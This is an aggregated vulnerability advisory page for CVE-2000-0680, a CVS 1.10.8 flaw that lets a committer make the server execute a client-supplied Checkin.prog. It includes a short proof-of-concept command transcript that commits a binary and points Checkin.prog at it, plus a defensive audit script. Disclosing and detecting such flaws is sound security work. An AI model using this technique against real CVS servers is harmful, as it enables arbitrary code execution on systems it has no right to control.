CVE-2000-0680
CVSS 7.2
Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:37

[Original] The CVS 1.10.8 server does not properly restrict users from creating arbitrary Checkin.prog or Update.prog programs, which allows remote CVS committers to modify or create Trojan horse programs with the Checkin.prog or Update.prog names, then performing a CVS commit action.


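[CNNVD] CVS Checkin.prog Binary Execution Vulnerability (CNNVD-200010-046)

        The CVS 1.10.8 server does not properly restrict users from creating arbitrary Checkin.prog or Update.prog programs. A remote CVS committer can exploit this vulnerability to modify or create a Trojan horse program named Checkin.prog or Update.prog and then perform a CVS commit operation.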

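- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause the system to go down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]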

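- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0680
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0680
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-046
(official data source) CNNVD

- Other links and resources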

http://www.securityfocus.com/bid/1524
(VENDOR_ADVISORY)  BID  1524
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26msg%3Dhvou2daoebb.fsf%40serein.m17n.org
(VENDOR_ADVISORY)  BUGTRAQ  20000728 cvs security problem

- Vulnerability information

CVS Checkin.prog Binary Execution Vulnerability
High risk  Access validation error
2000-10-20 00:00:00 2005-10-20 00:00:00
Remote / Local

- Advisories and patches

        Tanaka Akira has provided a patch for CVS 1.10.8.
        CVS Kit CVS Server 1.10.8
        

- Vulnerability information (20108)

CVS Kit CVS Server 1.10.8 Checkin.prog Binary Execution Vulnerability (EDBID:20108)
unix local
2000-06-28 Verified
0 Tanaka Akira
N/A [Download]
source: http://www.securityfocus.com/bid/1524/info

A CVS committer can execute arbitrary binaries by using Checkin.prog. Usually, CVS/Checkin.prog in a working directory is copied from CVSROOT/modules when the directory is checked out, and it is sent back to the server and executed on commit. Note that when it is executed, the committed files exist in the current directory.

Since a working directory can be modified by a committer, Checkin.prog may be modified or even newly created. If a malicious committer does this, the CVS server executes the modified Checkin.prog. Also note that the committer can create an arbitrary binary file with `cvs add -kb' and `cvs commit'. The malicious committer can thus execute the just-committed binary file via Checkin.prog, triggered by the `cvs commit'.

% cvs -d :pserver:test@localhost:/tmp/cvs -f co somemodule
cvs server: Updating somemodule
% cd somemodule
% cp /bin/ls binary
% cvs add -kb binary
cvs server: scheduling file `binary' for addition
cvs server: use 'cvs commit' to add this file permanently
% echo ./binary > CVS/Checkin.prog
% cvs commit -m 'test'
cvs commit: Examining .
RCS file: /tmp/cvs/somemodule/binary,v
done
Checking in binary;
/tmp/cvs/somemodule/binary,v <-- binary
initial revision: 1.1
done
cvs server: Executing ''./binary' '/tmp/cvs/somemodule''
#cvs.lock
#cvs.wfl.serein.m17n.org.14330
binary,v 		
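
The weakness shown above is that the program name comes from the committer's working copy rather than from CVSROOT/modules. As an added example (not part of the original advisory and not Tanaka Akira's patch), this script compares a working copy's CVS/Checkin.prog and CVS/Update.prog with the `-i` and `-u` programs configured for the module. The module-name argument, the `/usr/local/bin/ci-notify` path and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag working copies whose CVS/Checkin.prog or CVS/Update.prog
# differ from the -i / -u programs configured in CVSROOT/modules.

# Print the program configured for MODULE with option FLAG (-i or -u),
# or nothing if the module has no such option. Continuation lines in the
# modules file are not handled (simplifying assumption).
configured_prog() {  # configured_prog MODULES_FILE MODULE FLAG
    awk -v mod="$2" -v flag="$3" '
        $1 ~ /^#/ { next }                  # skip comment lines
        $1 == mod {
            for (i = 2; i < NF; i++)
                if ($i == flag) { print $(i + 1); exit }
        }' "$1"
}

# Return 0 if the working copy matches the modules file, 1 otherwise.
# Each mismatch is reported on stdout, one per line.
audit_workdir() {  # audit_workdir WORKDIR MODULES_FILE MODULE
    rc=0
    for pair in "Checkin.prog:-i" "Update.prog:-u"; do
        name=${pair%%:*}; flag=${pair##*:}
        want=$(configured_prog "$2" "$3" "$flag")
        have=""
        [ -f "$1/CVS/$name" ] && have=$(cat "$1/CVS/$name")
        if [ "$have" != "$want" ]; then
            echo "MISMATCH $name: working copy='$have' modules='$want'"
            rc=1
        fi
    done
    return $rc
}

# Constructed sample data: a modules file and two working copies.
demo=$(mktemp -d)
printf '# constructed sample\nsomemodule -i /usr/local/bin/ci-notify somemodule\n' > "$demo/modules"
mkdir -p "$demo/clean/CVS" "$demo/tampered/CVS"
echo /usr/local/bin/ci-notify > "$demo/clean/CVS/Checkin.prog"
echo ./binary > "$demo/tampered/CVS/Checkin.prog"   # as in the transcript above

audit_workdir "$demo/clean" "$demo/modules" somemodule && echo "clean: ok"
audit_workdir "$demo/tampered" "$demo/modules" somemodule || echo "tampered: flagged"
```

A check like this only helps on hosts where the working copy can be inspected; the server itself still has to stop trusting the client-supplied file.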

- Vulnerability information

7408
CVS Checkin.prog/Update.prog Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-06-28 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or vendor upgrades to correct this issue. However, Tanaka Akira has released an unofficial patch to address this vulnerability. As with all third-party solutions, ensure they come from a reliable source and are permitted under your company's security policy.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

CVS Checkin.prog Binary Execution Vulnerability
Access Validation Error 1524
Yes Yes
2000-07-28 12:00:00 2009-07-11 02:56:00
Posted to BugTraq on July 28, 2000 by Tanaka Akira <akr@m17n.org>

- Affected program versions

CVS Kit CVS Server 1.10.8

- Solution

Tanaka Akira <akr@m17n.org> has provided a patch for CVS 1.10.8.


CVS Kit CVS Server 1.10.8

- Related references

 

 
